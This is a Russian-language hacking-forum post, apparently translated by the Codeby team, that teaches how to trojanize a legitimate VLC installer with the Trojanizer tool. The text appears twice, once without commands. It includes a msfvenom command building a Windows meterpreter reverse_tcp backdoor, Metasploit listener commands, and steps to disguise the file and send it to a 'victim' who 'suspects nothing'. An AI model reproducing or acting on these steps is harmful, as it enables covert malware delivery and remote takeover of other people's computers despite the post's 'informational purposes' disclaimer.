Здарова бандиты и прочая кибернечисть. С новым подгончиком.
Первоисточник:
Перевод: Перевод выполнен от команды Codeby
Примечание от команды форума:
Откуда скачать?
Далее создаем пейлоад, используя msfvenom
Запуск Trojanizer
Переходим в папку с Trojanizer и запускаем Trojanizer.sh файл. У Trojanizer есть зависимости, которые нужны для работы тулзы, он попробует их поставить сам, но в случае неудачи, установите следующие пакеты: Wine Program Files, WinRAR Software and Zenity.
После запуска откроется форма для сжатия. Здесь можно выбрать пейлоад, который мы создали, используя msfvenom, в самом начале.
После выбора пейлоада, откроется другое окно под названием Legit Application to Trojanize
Далее нужно выбрать любой исполняемый файл (.exe), который хотим связать с нашей нагрузкой. Я связываю VLC Player Installer File с моей нагрузкой.
После того, как вы нажмете ОК, необходимо будет задать новое имя для файла. Сохраните его как файл инсталлятор. Например, vlc-32bit-Installer или vlc-update64 или по вашему выбору.
Теперь необходимо выбрать иконку для нашего инсталлятора. Вы можете выбрать из списка по умолчанию или загрузить любой файл с иконкой в формате (.ico) из Google.
Как можно видеть из приведенного выше скрина, я добавил файл vlc-icon.ico как иконку.
А теперь давайте поднимем Listener в Metasploit:
Отправляем вредоносную программу на машину жертвы любым удобным способом.
Когда пользователь откроет файл, он получит обычное предупреждение о безопасности, как показано ниже.
После того, как жертва нажмет RUN, у пользователя начнет работать VLC installer, и он ничего не заподозрит.
Но в тоже время, у нас будет meterpreter сессия, как показано ниже.
Именно так можно связать файл нашу нагрузку с любым файлом программного обеспечения (.exe) с использованием Trojanizer.
Первоисточник:
Ссылка скрыта от гостей
Перевод: Перевод выполнен от команды Codeby
Примечание от команды форума:
- Статья является переводом.
- Статья исключительно в ознакомительных целях.
Откуда скачать?
git clone https://github.com/r00t-3xp10it/trojanizer.git
Далее создаем пейлоад, используя msfvenom
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.111 lport=4466 -f exe > /root/Desktop/backdoor.exe
Запуск Trojanizer
Переходим в папку с Trojanizer и запускаем Trojanizer.sh файл. У Trojanizer есть зависимости, которые нужны для работы тулзы, он попробует их поставить сам, но в случае неудачи, установите следующие пакеты: Wine Program Files, WinRAR Software and Zenity.
После запуска откроется форма для сжатия. Здесь можно выбрать пейлоад, который мы создали, используя msfvenom, в самом начале.
После выбора пейлоада, откроется другое окно под названием Legit Application to Trojanize
Далее нужно выбрать любой исполняемый файл (.exe), который хотим связать с нашей нагрузкой. Я связываю VLC Player Installer File с моей нагрузкой.
После того, как вы нажмете ОК, необходимо будет задать новое имя для файла. Сохраните его как файл инсталлятор. Например, vlc-32bit-Installer или vlc-update64 или по вашему выбору.
Теперь необходимо выбрать иконку для нашего инсталлятора. Вы можете выбрать из списка по умолчанию или загрузить любой файл с иконкой в формате (.ico) из Google.
Как можно видеть из приведенного выше скрина, я добавил файл vlc-icon.ico как иконку.
После выбора файла иконки выпадает окно, сообщающее путь к новому файлу инсталлятору.
А теперь давайте поднимем Listener в Metasploit:
Код:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.111
msf exploit(multi/handler) > set lport 4466
msf exploit(multi/handler) > run -jОтправляем вредоносную программу на машину жертвы любым удобным способом.
Когда пользователь откроет файл, он получит обычное предупреждение о безопасности, как показано ниже.
После того, как жертва нажмет RUN, у пользователя начнет работать VLC installer, и он ничего не заподозрит.
Но в тоже время, у нас будет meterpreter сессия, как показано ниже.
Именно так можно связать файл нашу нагрузку с любым файлом программного обеспечения (.exe) с использованием Trojanizer.
Последнее редактирование:
